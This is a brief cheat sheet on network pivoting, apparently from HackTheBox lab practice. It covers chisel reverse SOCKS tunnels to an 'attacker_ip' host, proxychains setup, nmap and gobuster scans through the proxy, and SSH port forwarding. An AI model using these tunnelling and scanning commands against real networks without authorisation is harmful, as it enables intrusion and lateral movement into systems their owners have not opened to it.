Pivot
Chisel :
################################# Attacker Machine ###############################
./chisel server -p 8080 --reverse
#################################### Pivot Machine ################################
chisel.exe client attacker_ip:8080 R:socks
############################### Proxychains.conf #################################
socks5 127.0.0.1 1080
################################## Nmap Scan ####################################
Always better to transfer binaries and scan from the pivot
nmap.exe -sC -sV 10.10.10.10 -Pn -T5 // From Pivot machine
proxychains nmap 10.10.10.10 -T5 -Pn -sT // From Kali Machine
################################### Gobuster ####################################
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -p socks5://127.0.0.1:1080
Pivot via SSH key (HTB Nibbles)
  • ssh -i root.key -L9000:web_ip:port ssh_ip
    • Ex : ssh -i root.key -L9000:10.10.10.75:80 10.10.10.73
Pivot via root password (HTB Sense)
  • ssh -D1080 pivot_ip
  • Burp -> user options -> socks proxy -> use socks proxy
  • vi /etc/proxychains.conf
  • Change socks4(metasploit) to socks5(ssh)
  • proxychains curl -k https://10.10.10.60 [ -k to ignore SSL]
Copy link